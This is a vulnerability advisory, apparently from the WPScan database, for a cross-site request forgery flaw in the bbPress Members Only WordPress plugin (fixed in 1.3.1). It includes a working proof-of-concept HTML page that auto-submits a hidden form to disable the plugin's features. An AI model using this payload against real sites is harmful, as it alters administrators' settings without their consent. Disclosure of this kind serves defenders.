bbPress Members Only <= 1.2.1 - CSRF on Optional Settings page



Description
The plugin does not prevent Cross-Site Request Forgery attacks on its 'Optional Settings' page.
Proof of Concept
<html>
  <body onload="document.forms[0].submit()">
    <form action="http://127.0.0.1/wp-admin/admin.php?page=bpmemberoptionalsettings" method="POST">
      <input type="hidden" name="bbpdisableallfeature" value="yes" />
      <input type="hidden" name="bbpoptionsettinspanelsubmit" value="&#32;Submit&#32;" />
    </form>
  </body>
</html>

Affects Plugin

fixed in version 1.3.1

References

URL https://plugins.trac.wordpress.org/changeset/2217984

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Views 166709
Verified Yes
WPVDB ID 9982

Timeline

Publicly Published 2019-12-26 (5 months ago)
Added 2019-12-26 (5 months ago)
Last Updated 2019-12-26 (5 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin